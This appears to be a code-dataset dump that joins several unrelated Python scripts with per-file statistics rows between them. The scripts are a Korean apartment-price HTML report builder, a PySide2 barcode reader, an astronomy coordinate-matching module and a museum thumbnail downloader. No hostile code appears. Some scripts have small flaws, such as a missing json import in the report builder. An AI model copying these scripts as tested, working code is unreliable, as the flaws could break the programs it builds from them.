from typing import List, Optional, Tuple
import datetime
import re
import io
import base64
import os
import sys
import argparse
from plotly.missing_ipywidgets import FigureWidget
from tqdm import tqdm
import minify_html
ROOT=os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(ROOT)
import plotly
import plotly.io
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import korea_apartment_price
from korea_apartment_price.db import ApartmentId, EntryNotFound
from korea_apartment_price.utils import editdist
def date_serial2date(x: int):
    """Convert a YYYYMMDD integer serial into a ``datetime.datetime``."""
    year, rest = divmod(x, 10000)
    month, day = divmod(rest, 100)
    return datetime.datetime(year, month, day)
def render_graph(apts: List[ApartmentId], date_from=20190101)->Tuple[str, FigureWidget]:
    """Build a price chart for one apartment complex.

    Plots confirmed trades (blue markers), canceled trades (orange x)
    and KB orderbook asking prices (red segments whose opacity scales
    with the listing count).  Returns ``(title, figure)`` where title is
    an (address, name-with-size) pair.
    """
    # All sizes traded since date_from; fall back to the requested sizes
    # when there are no trades at all.
    sizes = set(korea_apartment_price.db.query_trades(apt_ids=apts, filters=[korea_apartment_price.db.pick_size], date_from=date_from, include_canceled=True))
    if len(sizes) == 0:
        sizes = set([apt['size'] for apt in apts])
    # Chart the traded size closest to the size requested for the first apt.
    favorite_size = apts[0]['size']
    chosen_size = list(sorted([(abs(s-favorite_size), s) for s in sizes]))[0][1]
    fig = go.Figure()
    # Strip a trailing complex number ("N단지") from the apartment name.
    aptname = re.sub(r'[0-9]+[ ]*단지[ ]*$', '', apts[0]["name"])
    title=(f'{apts[0]["address"]}', f'{aptname} (전용 {chosen_size}평)')
    fig.update_layout(height = 500, margin=dict(l=10, r=10, b=10, t=10))
    fig.update_yaxes(
        showline=True,
        linecolor='black',
        linewidth=1,
        mirror=True
    )
    fig.update_xaxes(
        tickformat='%Y-%m-%d',
        hoverformat='%Y-%m-%d',
        showline=True,
        linecolor='black',
        linewidth=1,
        mirror=True
    )
    # Trades within +/-0.9 of the chosen size, canceled ones split out.
    # The /10000 below presumably converts 만원 to 억원 — confirm units.
    trades = korea_apartment_price.db.query_trades(apt_ids=apts, size_from=chosen_size-0.9, size_to=chosen_size+0.9, date_from=date_from, include_canceled=True)
    trades_x = [date_serial2date(t['date_serial']) for t in trades if not t['is_canceled']]
    trades_y = [t['price'] / 10000 for t in trades if not t['is_canceled']]
    labels = [f'{t["floor"]}층' for t in trades if not t['is_canceled']]
    canceled_trades_x = [date_serial2date(t['date_serial']) for t in trades if t['is_canceled']]
    canceled_trades_y = [t['price'] / 10000 for t in trades if t['is_canceled']]
    canceled_labels = [f'{t["floor"]}층(취소)' for t in trades if t['is_canceled']]
    el = go.Scattergl(x=trades_x, y=trades_y, showlegend = False, marker={'color': 'blue', 'size': 10}, mode='markers', hovertext=labels, name='실거래')
    el_canceled = go.Scattergl(x=canceled_trades_x, y=canceled_trades_y, showlegend = False, marker={'color': 'orange', 'size': 10, 'symbol': 'x'}, mode='markers', hovertext=canceled_labels, name='취소')
    fig.add_trace(el)
    fig.add_trace(el_canceled)
    # Use the first apt that has KB orderbook data.
    # NOTE(review): if every apt raises EntryNotFound, kb_orderbook is never
    # bound and the loop below raises NameError — confirm this is intended.
    for apt in apts:
        try:
            kb_orderbook = sorted(korea_apartment_price.db.query_kb_orderbook(apt, size_from=chosen_size-1, size_to=chosen_size+1, fetched_from=date_from), key=lambda x: x['fetched_at'])
            break
        except EntryNotFound:
            print(apt)
            pass
    fetched_date_cnt = {}         # fetch date -> number of listings
    fetched_price_date_cnt = {}   # (fetch date, price) -> listing count
    fetched_price_date_lbls = {}  # (fetch date, price) -> unit labels
    for od in kb_orderbook:
        date_end = od['fetched_at']
        # Prefer the minimum asking price when the detail record has one.
        if od['detail']['최소매매가'] is not None:
            price = int(od['detail']['최소매매가']) / 10000
        else:
            price = od['price'] / 10000
        fetched_date_cnt[date_end] = fetched_date_cnt.get(date_end, 0) + 1
        fetched_price_date_cnt[(date_end, price)] = fetched_price_date_cnt.get((date_end, price), 0) + 1
        if not (date_end, price) in fetched_price_date_lbls:
            fetched_price_date_lbls[(date_end, price)] = set()
        # Human-readable unit label: dong/ho when known, otherwise floor.
        curlbl = ''
        if od['apt_dong'] is not None and len(od['apt_dong']) > 0:
            curlbl += f'{od["apt_dong"]}동'
        if od['apt_ho'] is not None and len(od['apt_ho']) > 0:
            curlbl += f'{od["apt_ho"]}호'
        elif od['floor'] is not None and len(od['floor']) > 0:
            curlbl += f'{od["floor"]}'
        if curlbl == '': curlbl='정보없음'
        curlbl = curlbl.replace('제', '').replace('T', '')
        fetched_price_date_lbls[(date_end, price)].add(curlbl)
    fetched_dates = sorted(fetched_date_cnt.keys())
    max_cnt = max([1] + list(fetched_price_date_cnt.values()))
    for (date_end, price), cnt in sorted(fetched_price_date_cnt.items()):
        # Draw each listing as a horizontal segment from the previous fetch
        # date to this one (or 2 days back when this is the earliest fetch).
        date_start = None
        for trial_date_start in fetched_dates:
            if trial_date_start < date_end: date_start = trial_date_start
        if date_start is None:
            date_start = date_end - datetime.timedelta(2)
        # Opacity encodes how many listings share this (date, price).
        opacity = min(1.0, 0.1 + 0.9 * cnt / max_cnt)
        fig.add_trace(go.Scattergl(x=[date_start, date_end], y=[price, price], line={'width':2, 'color':'red'}, marker=None, opacity=opacity, showlegend = False, name='', hoverinfo='skip', mode='lines'))
        details = sorted(list(fetched_price_date_lbls[(date_end, price)]))
        details = '<br>' + '<br>'.join(sorted(details))
        marker = go.Scattergl(x=[date_end], y=[price], text=[f'{cnt}개 {details}'], line=None, marker={'color':'red', 'size': 3}, opacity=opacity, showlegend = False, name='', mode='markers')
        fig.add_trace(marker)
    return title, fig
# Command-line interface: input apartment-list CSV and output HTML path.
parser = argparse.ArgumentParser()
parser.add_argument('aptlst', help='a csv file that contains gu and the apartment name')
parser.add_argument('output', help='output html report path')
args = parser.parse_args()
apts = []
print('[+] reading apartment list')
with open(args.aptlst, 'r') as f:
    for line in tqdm(f.readlines()):
        # Each row: "address,name[,size]"; size defaults to 18.
        line = line.strip()
        line = line.split(',', 2)
        if len(line) not in [2, 3]:
            print(f'Warning: ignoring line "{line}"')
            continue
        if len(line) == 2:
            addr, name = [s.strip() for s in line]
            size = 18
        else:
            addr, name, size = [s.strip() for s in line]
            size = int(size)
        selected=korea_apartment_price.shortcuts.search(addr, name)
        # Keep the DB entry whose name is closest (edit distance) to the query.
        best_editdist = None
        best_apt = None
        for apt in selected:
            apt['size'] = size
            cur_editdist = editdist(name, apt['name'])
            if best_apt is None or best_editdist > cur_editdist:
                best_apt = apt
                best_editdist = cur_editdist
        if best_apt is not None:
            apts.append(best_apt)
        else:
            print(f'[!] couldn\'t find apt entries for query=({addr}, {name})')
# Deduplicate by (address, name, size), keeping a stable sorted order.
uniq_apts = {}
for apt in apts:
    uniq_apts[(apt['address'], apt['name'], apt['size'])] = apt
apts = [uniq_apts[k] for k in sorted(uniq_apts.keys())]
######## XXX
#apts = apts[-3:]
# Group apartments that differ only by a trailing "N단지" (complex number)
# under one key so they share a single chart.
uniq_apts = {}
for apt in apts:
    aptname = re.sub(r'[0-9]+[ ]*단지[ ]*$', '', apt["name"])
    key = apt['address'], aptname, apt['size']
    if not key in uniq_apts: uniq_apts[key] = []
    uniq_apts[key].append(apt)
apt_keys = sorted(uniq_apts.keys())
print('[+] generating report')
for apt_addr, apt_name, apt_size in apt_keys:
    print(f'{apt_addr} {apt_name} [전용 {apt_size}평]')
data = []           # one chart record per grouped apartment
data_by_addr = {}   # address -> indices into `data`
addrlst = []
for aptidx, apt_key in enumerate(tqdm(apt_keys)):
    apts = uniq_apts[apt_key]
    (addr, aptname), fig = render_graph(apts)
    # Serialize the Plotly figure to plain JSON and force WebGL traces.
    cur_chart = json.loads(plotly.io.to_json(fig))
    if 'data' in cur_chart:
        for e in cur_chart['data']:
            e['type'] = 'scattergl'
    data.append({
        'addr': addr,
        'aptname': aptname,
        'fig': cur_chart,
    })
    if not addr in data_by_addr: data_by_addr[addr] = []
    data_by_addr[addr].append(aptidx)
addrlst = sorted(list(data_by_addr.keys()))
datestr = datetime.datetime.now().strftime('%Y-%m-%d')
# Page skeleton: jQuery + jQuery UI, Plotly, MathJax, select2 and Tailwind
# are all pulled from public CDNs, so the report is a single portable file.
html = f"""<!DOCTYPE html>
<html lang="kr">
<head>
<meta charset="utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>{datestr} 아파트 보고서</title>
<script src="https://code.jquery.com/jquery-3.6.0.js"></script>
<script src="https://code.jquery.com/ui/1.13.0/jquery-ui.js"></script>
<script type="text/javascript" src="https://cdn.plot.ly/plotly-latest.min.js"></script>
<script type="text/javascript" id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
<link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" />
<script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script>
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="//code.jquery.com/ui/1.13.0/themes/base/jquery-ui.css">
</head>
"""
# Embed all chart data as one compact JSON blob for the page script.
html += f"""<script>let chartData={json.dumps(data, ensure_ascii=False, separators=(',', ':'))};</script>"""
html += """<script>
function updateChart(idx) {
let chartdiv = document.getElementById('chart');
console.log(idx);
Plotly.react(chart, chartData[idx]['fig']['data'], chartData[idx]['fig']['layout'], {displayModeBar: false});
}
$(document).ready(()=>{
$('#aptselect').select2();
$('#aptselect').on('select2:select', function (e) {
let data = e.params.data;
updateChart(parseInt(data.id));
});
let chartdiv = document.getElementById('chart');
Plotly.newPlot(chart, chartData[0]['fig']['data'], chartData[0]['fig']['layout'], {displayModeBar: false});
});
</script>
"""
# <select> options grouped by address; the first chart is pre-selected.
options = ""
for cur_addr in addrlst:
    options += f'<optgroup label="{cur_addr}">'
    for cur_data_idx in data_by_addr[cur_addr]:
        cur_data = data[cur_data_idx]
        options += f'<option value="{cur_data_idx}" {"selected" if cur_data_idx == 0 else ""}>{cur_data["aptname"]}</option>'
    options += '</optgroup>'
html += f"""
<body>
<div class="h-screen m-0 p-0 flex flex-col">
<div class="grow-0">
<h3 class="text-center font-bold text-lg">{datestr} 아파트 보고서</h3>
<div class="m-3">
<select class="w-full p-3" id="aptselect" name="aptselect">
{options}
</select>
</div>
</div>
<div class="grow p-1"><div id="chart"></div></div>
</body>
</html>"""
with open(args.output, 'w') as f:
    f.write(html)
print('[+] done')
| 34.767025
| 199
| 0.66299
| 1,484
| 9,700
| 4.177898
| 0.234501
| 0.015806
| 0.025806
| 0.011613
| 0.237581
| 0.182742
| 0.136935
| 0.085645
| 0.066774
| 0.040645
| 0
| 0.017621
| 0.157526
| 9,700
| 278
| 200
| 34.892086
| 0.741067
| 0.004124
| 0
| 0.104348
| 0
| 0.043478
| 0.305867
| 0.061153
| 0.004348
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0.004348
| 0.082609
| 0
| 0.1
| 0.030435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ac67c019d243b02047c3a4e50c8d709addc5ed
| 5,241
|
py
|
Python
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 12
|
2020-01-08T13:43:19.000Z
|
2022-03-09T08:35:45.000Z
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 2
|
2020-09-10T07:06:50.000Z
|
2022-01-04T17:29:54.000Z
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 11
|
2020-03-16T18:22:13.000Z
|
2022-01-07T08:23:08.000Z
|
import sys
from PySide2.QtGui import QPixmap, QImage
from PySide2.QtWidgets import QApplication, QLabel, QPushButton, QVBoxLayout, QWidget, QFileDialog, QTextEdit, QSizePolicy, QMessageBox, QHBoxLayout
from PySide2.QtCore import Slot, Qt, QStringListModel, QSize, QTimer
from dbr import DynamsoftBarcodeReader
dbr = DynamsoftBarcodeReader()
import os
import cv2
class UI_Window(QWidget):
    """Main window: load an image or open the webcam and decode barcodes.

    Layout (top to bottom): load button, open/stop camera buttons, the
    image preview label, and a text area showing decode results.
    """
    def __init__(self):
        QWidget.__init__(self)
        # The default barcode image.
        dir_path = os.path.dirname(os.path.realpath(__file__))
        filename = os.path.join(dir_path, 'image.tif')
        # Create a timer.  It drives webcam frame grabs via nextFrameSlot.
        self.timer = QTimer()
        self.timer.timeout.connect(self.nextFrameSlot)
        # Create a layout.
        layout = QVBoxLayout()
        # Add a button
        self.btn = QPushButton("Load an image")
        self.btn.clicked.connect(self.pickFile)
        layout.addWidget(self.btn)
        # Add a button row for camera control.
        button_layout = QHBoxLayout()
        btnCamera = QPushButton("Open camera")
        btnCamera.clicked.connect(self.openCamera)
        button_layout.addWidget(btnCamera)
        btnCamera = QPushButton("Stop camera")
        btnCamera.clicked.connect(self.stopCamera)
        button_layout.addWidget(btnCamera)
        layout.addLayout(button_layout)
        # Add a label used as the image/video preview area.
        self.label = QLabel()
        self.label.setFixedSize(640, 640)
        pixmap = self.resizeImage(filename)
        self.label.setPixmap(pixmap)
        layout.addWidget(self.label)
        # Add a text area for decode results.
        self.results = QTextEdit()
        self.readBarcode(filename)
        layout.addWidget(self.results)
        # Set the layout
        self.setLayout(layout)
        self.setWindowTitle("Dynamsoft Barcode Reader")
        self.setFixedSize(800, 800)

    # https://stackoverflow.com/questions/1414781/prompt-on-exit-in-pyqt-application
    def closeEvent(self, event):
        """Confirm exit; stop the camera when the user accepts."""
        msg = "Close the app?"
        reply = QMessageBox.question(self, 'Message',
                                     msg, QMessageBox.Yes, QMessageBox.No)
        if reply == QMessageBox.Yes:
            event.accept()
            self.stopCamera()
        else:
            event.ignore()

    def readBarcode(self, filename):
        """Decode all barcodes in the image file and show them in the text area."""
        dbr.initLicense("Your License")
        # The mask selects which barcode formats to decode — see the
        # Dynamsoft BarcodeFormat constants; confirm against the DBR docs.
        results = dbr.decodeFile(filename, 0x3FF | 0x2000000 | 0x4000000 | 0x8000000 | 0x10000000)
        out = ''
        index = 0
        for result in results:
            # result is (format, value, ...) per the usage here.
            out += "Index: " + str(index) + "\n"
            out += "Barcode format: " + result[0] + '\n'
            out += "Barcode value: " + result[1] + '\n'
            out += '-----------------------------------\n'
            index += 1
        self.results.setText(out)

    def resizeImage(self, filename):
        """Scale the image down to fit the preview label, keeping aspect ratio."""
        pixmap = QPixmap(filename)
        lwidth = self.label.maximumWidth()
        pwidth = pixmap.width()
        lheight = self.label.maximumHeight()
        pheight = pixmap.height()
        wratio = pwidth * 1.0 / lwidth
        hratio = pheight * 1.0 / lheight
        if pwidth > lwidth or pheight > lheight:
            # Shrink along the dominant dimension.
            if wratio > hratio:
                lheight = pheight / wratio
            else:
                lwidth = pwidth / hratio
            scaled_pixmap = pixmap.scaled(lwidth, lheight)
            return scaled_pixmap
        else:
            # Already fits; return unscaled.
            return pixmap

    def pickFile(self):
        """Let the user pick an image file, preview it, and decode it."""
        self.stopCamera()
        # Load an image file.
        filename = QFileDialog.getOpenFileName(self, 'Open file',
                                               'E:\\Program Files (x86)\\Dynamsoft\\Barcode Reader 7.2\\Images', "Barcode images (*)")
        # Show barcode images
        pixmap = self.resizeImage(filename[0])
        self.label.setPixmap(pixmap)
        # Read barcodes
        self.readBarcode(filename[0])

    def openCamera(self):
        """Open webcam 0 at 640x480 and start grabbing ~24 frames/sec."""
        self.vc = cv2.VideoCapture(0)
        # vc.set(5, 30)  #set FPS
        self.vc.set(3, 640) #set width
        self.vc.set(4, 480) #set height
        if not self.vc.isOpened():
            msgBox = QMessageBox()
            msgBox.setText("Failed to open camera.")
            msgBox.exec_()
            return
        # NOTE(review): QTimer.start takes msec as int; 1000./24 is a float —
        # confirm PySide2 accepts/truncates it.
        self.timer.start(1000./24)

    def stopCamera(self):
        """Stop the frame-grab timer (leaves the capture device open)."""
        self.timer.stop()

    # https://stackoverflow.com/questions/41103148/capture-webcam-video-using-pyqt
    def nextFrameSlot(self):
        """Grab one webcam frame, preview it, and decode any barcodes in it."""
        rval, frame = self.vc.read()
        # OpenCV delivers BGR; Qt expects RGB.
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        image = QImage(frame, frame.shape[1], frame.shape[0], QImage.Format_RGB888)
        pixmap = QPixmap.fromImage(image)
        self.label.setPixmap(pixmap)
        results = dbr.decodeBuffer(frame, 0x3FF | 0x2000000 | 0x4000000 | 0x8000000 | 0x10000000)
        out = ''
        index = 0
        for result in results:
            out += "Index: " + str(index) + "\n"
            out += "Barcode format: " + result[0] + '\n'
            out += "Barcode value: " + result[1] + '\n'
            out += '-----------------------------------\n'
            index += 1
        self.results.setText(out)
def main():
    """Create the Qt application, show the reader window, and block until exit."""
    app = QApplication(sys.argv)
    window = UI_Window()
    window.show()
    sys.exit(app.exec_())


if __name__ == '__main__':
    main()
| 31.011834
| 148
| 0.577752
| 549
| 5,241
| 5.453552
| 0.342441
| 0.024048
| 0.014696
| 0.024048
| 0.133601
| 0.111556
| 0.111556
| 0.111556
| 0.111556
| 0.111556
| 0
| 0.039771
| 0.299561
| 5,241
| 168
| 149
| 31.196429
| 0.77581
| 0.072505
| 0
| 0.237288
| 0
| 0
| 0.078877
| 0.020442
| 0
| 0
| 0.017345
| 0
| 0
| 1
| 0.076271
| false
| 0
| 0.059322
| 0
| 0.169492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75af09b693b1a39a86476d750fe6c76d93b99535
| 6,820
|
py
|
Python
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 2
|
2021-07-12T09:41:51.000Z
|
2022-01-27T08:13:33.000Z
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 6
|
2019-04-04T23:53:27.000Z
|
2021-07-30T11:35:20.000Z
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 2
|
2020-10-30T18:14:29.000Z
|
2021-07-22T16:34:56.000Z
|
import sys
import logging
import numpy as np
logger = logging.getLogger(__name__)
class TryAgainError(Exception):
    """
    signal to skip this image(s) and try a new one
    """
    def __init__(self, message):
        # Forward the message to the base Exception constructor.
        super().__init__(message)
def setup_logging(level):
    """Configure root logging to stdout at the named level (default CRITICAL)."""
    levels = {
        'info': logging.INFO,
        'debug': logging.DEBUG,
        'warning': logging.WARNING,
        'error': logging.ERROR,
    }
    logging.basicConfig(stream=sys.stdout, level=levels.get(level, logging.CRITICAL))
def log_pars(pars, fmt='%8.3g', front=None):
    """
    print the parameters with a uniform width
    """
    pieces = []
    if front is not None:
        pieces.append(front)
    if pars is not None:
        # One fixed-width slot per parameter.
        full_fmt = ' '.join([(fmt + ' ') for _ in pars])
        pieces.append(full_fmt % tuple(pars))
    logger.debug(' '.join(pieces))
class Namer(object):
    """
    create strings with a specified front prefix (and/or back suffix)
    """
    def __init__(self, front=None, back=None):
        # Empty affixes (and the special 'noshear' back) mean "no change".
        if front == '':
            front = None
        if back in ('', 'noshear'):
            back = None
        self.front = front
        self.back = back
        # Precompute whether any modification is needed at all.
        self.nomod = front is None and back is None

    def __call__(self, name):
        if self.nomod:
            return name
        result = name
        if self.front is not None:
            result = '%s_%s' % (self.front, result)
        if self.back is not None:
            result = '%s_%s' % (result, self.back)
        return result
def convert_run_to_seed(run):
    """
    convert the input config file name to an integer for use
    as a seed
    """
    import hashlib

    # Hash the name and fold it into the 30-bit seed range.
    digest = hashlib.sha256(run.encode('utf-8')).hexdigest()
    seed = int(digest, base=16) % 2**30
    logger.info("got seed %d from run %s" % (seed, run))
    return seed
def get_trials_nsplit(c):
    """
    split into chunks

    Returns (ntrials_per, nsplit, time_hours) computed from the config
    keys 'ntrials', 'desired_hours' and 'sec_per'.
    """
    from math import ceil

    sec_per = c['sec_per']
    ntrials = c['ntrials']
    # Number of trials that fit in the desired wall-clock budget.
    ntrials_per = int(round(c['desired_hours'] * 3600.0 / sec_per))
    nsplit = int(ceil(ntrials / float(ntrials_per)))
    time_hours = ntrials_per * sec_per / 3600.0
    logger.info("ntrials requested: %s" % (ntrials))
    logger.info('seconds per image: %s sec per with rand: %s' % (c['sec_per'],sec_per))
    logger.info('nsplit: %d ntrials per: %d time (hours): %s' % (nsplit,ntrials_per,time_hours))
    return ntrials_per, nsplit, time_hours
def get_trials_per_job_mpi(njobs, ntrials):
    """
    split for mpi: trials per job, rounded to the nearest integer
    """
    per_job = float(ntrials) / njobs
    return int(round(per_job))
#
# matching by row,col
#
def match_truth(data, truth, radius_arcsec=0.2, pixel_scale=0.263):
    """
    get indices in the data that match truth catalog by x,y position
    """
    # Convert the match radius from arcsec to pixels.
    radius_pixels = radius_arcsec / pixel_scale
    print("matching")
    allow = 1
    mdata, mtruth = close_match(
        data['x'], data['y'],
        truth['x'], truth['y'],
        radius_pixels, allow,
    )
    nmatch = mdata.size
    ntot = data.size
    frac = float(nmatch) / ntot
    print(' matched %d/%d %.3f within '
          '%.3f arcsec' % (nmatch, ntot, frac, radius_arcsec))
    return mdata
def close_match(t1,s1,t2,s2,ep,allow,verbose=False):
    """
    Find the nearest neighbors between two arrays of x/y

    parameters
    ----------
    t1, s1: scalar or array
        coordinates of a set of points. Must be same length.
    t2, s2: scalar or array
        coordinates of a second set of points. Must be same length.
    ep: scalar
        maximum match distance between pairs (pixels)
    allow: scalar
        maximum number of matches in second array to each element in first array.
    verbose: boolean
        make loud

    returns
    -------
    (m1, m2): index arrays into the first and second point sets for the
        matched pairs (both empty when nothing matches).

    Original by Dave Johnston, University of Michigan, 1997
    Translated from IDL by Eli Rykoff, SLAC
    modified slightly by erin sheldon
    """
    t1=np.atleast_1d(t1)
    s1=np.atleast_1d(s1)
    t2=np.atleast_1d(t2)
    s2=np.atleast_1d(s2)
    n1=t1.size
    n2=t2.size
    # matcharr[i, :] holds up to `allow` indices (into the t-sorted second
    # set) matched to point i; -1 means "no match".
    matcharr=np.zeros([n1,allow],dtype='i8')
    matcharr.fill(-1)
    ind=np.arange(n2,dtype='i8')
    # Sort the second set by t so candidates form a contiguous window.
    sor=t2.argsort()
    t2s=t2[sor]
    s2s=s2[sor]
    ind=ind[sor]
    runi=0
    endt=t2s[n2-1]
    for i in range(n1):
        t=t1[i]
        # Candidate window: second-set points with t in [t-ep, t+ep].
        tm=t-ep
        tp=t+ep
        in1=_binary_search(t2s,tm) # I can improve this?
        if in1 == -1:
            # tm is below the whole array but the window may still overlap.
            if (tm < endt) : in1=0
        if in1 != -1:
            in1=in1+1
            in2=in1-1
            # Advance in2 to the last element with t < tp.
            jj=in2+1
            while (jj < n2):
                if (t2s[in2+1] < tp):
                    in2+=1
                    jj+=1
                else :
                    jj=n2
            if (n2 == 1) :
                in2=0 # hmmm
            if (in1 <= in2):
                if (n2 != 1) :
                    check = s2s[in1:in2+1]
                    tcheck = t2s[in1:in2+1]
                else :
                    check = s2s[0]
                    tcheck=t2s[0]
                s=s1[i]
                t=t1[i]
                # Box cut: both coordinate offsets must be within ep.
                offby=abs(check-s)
                toffby=abs(tcheck-t)
                good=np.where(np.logical_and(offby < ep,toffby < ep))[0]+in1
                ngood=good.size
                if (ngood != 0) :
                    if (ngood > allow) :
                        # Too many matches: keep the `allow` nearest by
                        # Euclidean distance.
                        offby=offby[good-in1]
                        toffby=toffby[good-in1]
                        dist=np.sqrt(offby**2+toffby**2)
                        good=good[dist.argsort()]
                        ngood=allow
                    good=good[0:ngood]
                    matcharr[i,0:ngood]=good
                    runi=runi+ngood
    if verbose:
        print("total put in bytarr:",runi)
    #matches=np.where(matcharr != -1)[0]
    matches=np.where(matcharr != -1)
    #if (matches.size == 0):
    if (matches[0].size == 0):
        if verbose:
            print("no matches found")
        m1=np.array([])
        m2=np.array([])
        return m1,m2
    m1 = matches[0] % n1
    m2 = matcharr[matches]
    # Map sorted-order indices back to original second-set indices.
    m2 = ind[m2].flatten()
    if verbose:
        print(m1.size,' matches')
    return m1,m2
def _binary_search(arr,x,edgedefault=False,round=False):
n=arr.size
if (x < arr[0]) or (x > arr[n-1]):
if (edgedefault):
if (x < arr[0]): index = 0
elif (x > arr[n-1]): index = n-1
else: index = -1
return index
down=-1
up=n
while (up-down) > 1:
mid=down+(up-down)//2
if x >= arr[mid]:
down=mid
else:
up=mid
index=down
if (round) and (index != n-1):
if (abs(x-arr[index]) >= abs(x-arr[index+1])): index=index+1
return index
| 23.680556
| 96
| 0.523167
| 918
| 6,820
| 3.813725
| 0.293028
| 0.011997
| 0.010283
| 0.007998
| 0.050843
| 0.037704
| 0.015424
| 0
| 0
| 0
| 0
| 0.03636
| 0.350733
| 6,820
| 287
| 97
| 23.763066
| 0.754291
| 0.151906
| 0
| 0.078212
| 0
| 0
| 0.057266
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061453
| false
| 0
| 0.027933
| 0
| 0.150838
| 0.027933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b16b8f307524cf047b1b8450582a6ea17185b4
| 1,470
|
py
|
Python
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 97
|
2019-05-07T15:43:30.000Z
|
2022-03-30T01:43:47.000Z
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 7
|
2020-05-05T17:12:08.000Z
|
2022-03-11T23:41:25.000Z
|
utilities/thumbnail-creation/thumbnail from category.py
|
DASdaNen4f/microsoftw
|
0ff9e052738e0effb9a484210ac27990f0f14f6f
|
[
"CC-BY-4.0",
"MIT"
] | 29
|
2019-05-30T22:23:25.000Z
|
2022-02-24T15:13:51.000Z
|
import pandas as pd
from PIL import Image
import requests
from io import BytesIO
import os
import math
# Met Museum artworks metadata dump; source of object ids and image URLs.
df = pd.read_csv('C:\\Users\\v-ngdian\\Documents\\utilities\\thumbnail creator\\MetArtworksAugmented.csv')
# Maximum thumbnail dimensions (width, height) in pixels.
size = 512, 512
# Object ids successfully thumbnailed, in processing order.
ids = []
def make_thumbnail(objectID, url, foldername):
    """Download *url*, shrink it to the module-level ``size`` bound, and save
    it as ``<foldername>/<objectID>.jpg`` next to this script.  Appends the
    id to the module-level ``ids`` list on success."""
    try:
        raw = requests.get(url).content
        image = Image.open(BytesIO(raw))
        ids.append(objectID)
        image.thumbnail(size, Image.ANTIALIAS)
        out_dir = os.path.dirname(os.path.abspath(__file__))
        out_path = os.path.join(out_dir, foldername, str(objectID) + '.jpg')
        image.save(out_path, "JPEG")
    except Exception:
        # Any failure (network, decode, disk) is reported and skipped.
        print("Invalid URL: {}".format(url))
        return
def run(category, foldername):
    """Create thumbnails for every artwork whose Object Name equals *category*,
    saving them under *foldername*.

    Skips rows whose image URL is NaN and rows whose object id is not an
    int (logging the latter); prints progress every 50 rows.
    """
    df_filtered = df[df['Object Name'] == category]
    print("There are {} objects in ".format(df_filtered.shape[0]) + category)
    counter = -1
    for index, row in df_filtered.iterrows():
        counter += 1
        objectID = row['Object ID']
        url = row['PrimaryImageUrl']
        if counter % 50 == 0:
            print("Working on object: " + str(counter) + " with id: " + str(objectID))
        # BUG FIX: the original used bare `next` statements here, which only
        # evaluate the builtin and do nothing; `continue` is the intended skip.
        if isinstance(url, float) and math.isnan(url):
            continue
        elif not isinstance(objectID, int):
            print("Object id: {} not an integer".format(objectID))
            continue
        else:
            make_thumbnail(objectID, url, foldername)
# Generate thumbnails for all vases, then report which ids succeeded.
run("vase", "vases")
print(ids)
| 29.4
| 106
| 0.622449
| 180
| 1,470
| 5.027778
| 0.516667
| 0.01989
| 0.046409
| 0.053039
| 0.075138
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01087
| 0.24898
| 1,470
| 50
| 107
| 29.4
| 0.808877
| 0
| 0
| 0.05
| 0
| 0
| 0.159075
| 0.057784
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.15
| 0
| 0.225
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
